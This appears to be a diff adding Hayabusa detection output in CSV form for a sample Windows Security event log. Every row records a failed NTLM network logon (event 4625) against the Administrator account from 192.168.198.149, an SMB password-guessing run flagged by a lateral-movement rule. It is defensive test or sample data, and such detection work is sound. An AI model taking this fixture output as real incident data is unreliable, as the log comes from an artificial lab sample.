+2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xVaRybjI4HdZV0Zs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tTcl30MvvycjFcQb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fVZqbCr9EwmV4gNE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zVwhii0TVmCkpDI0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2Tx04CPPVa6WYY9G  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gHyefIGqhIIy3ZI9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Wrietoh4wgXcEvNd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9WW0Y5PW2JfCCdyR  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tmXsMJ0ELK4qiNY6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yeftUqriSoxCgmDy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 60JE9WQQ8N00j65B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: r0rt2yVAEH6V4IIS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pay98C2Gr1di7qQd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8TyPDYm9QCAmqj7h  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1Dw3iK7DQMVXy8LW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BMuO0QEkxpKRv4Vl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RaHECaQDXCXQc9Xw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ewXT2VcARiaNLIxJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: dGSTrm4AOojs7So0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wVTBSk0Q65LkaTqg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: NjFN51w3T4VwuWa5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KG7a88h48ZEyOuYw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6ksKuTSGukc5em3B  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: tPEMcGV6ZR92sWNY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iBQ6sKrRjb7BsySN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gDFnG1gv7jOeIQ0t  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QdFKkcNpkfAScnkp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: IAYbV4ioewwkZSmy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1bQ2Dxd6nlgSXJpo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: havLyoVCfdCqzrqO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: b2vZLhz19pXrq9iE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: A4TSN93DrSWb1ah4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QwFyrxiceLRTD9rI  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ARbqo84Mr5T3ltRg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 34HpQJO17IDWber9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bSSbqOtdSeH58oIp  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: EMvTo7fU6J468WE9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8gzx6Vr9LoInM1df  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kwXC2S4HwdwNE6SX  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1pQa1WxSt3bj9LEv  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: fm65jq9tRQznmWPh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zd8BJbXvEoaDADLc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: P0JlFw7S6jFUt4Iy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rfMbFXQcP5sA2wmf  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xu4pgyCcDjl9h0Et  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: B00w8dZG3sT2Lsqo  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8aKGq6qrchp4SLvT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XnScYHBCKOSHItsi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: r8UMBM326M7a4njd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kTdYWOi6p7etRfya  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JWSlcEVzj5lGtVg0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Xc77wukLTPOYAzj2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w4WmTwTGuwDN6YXn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aeN4cSffFA04oOje  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eYFPV1kGALqX8jyO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qIlhxT4qqo5bCsU3  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: btoOskH0112h7MTO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nWUhQJBcS7XbMJUq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: E70qmXDDWqmWJjyU  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oX0L8wf6nt2grLvn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0D8BwniiXsjfkYqE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: sSWYo4mphuvKHQHl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: im8an1mDle9f8skd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: aOyLWd5CAAjnJt3C  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: s7gI55uWlshCLw3y  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: l7UogJ8bBw6Epbht  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qIl0QRFHXCVAHWdV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: OxPv9v4TxFvS9JMy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: uHMGfCorrLXpDyeD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KQTKgFibIa8NWExO  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rEnx3upH3Om0wHn7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KlNbW1ljPSTdgUKY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
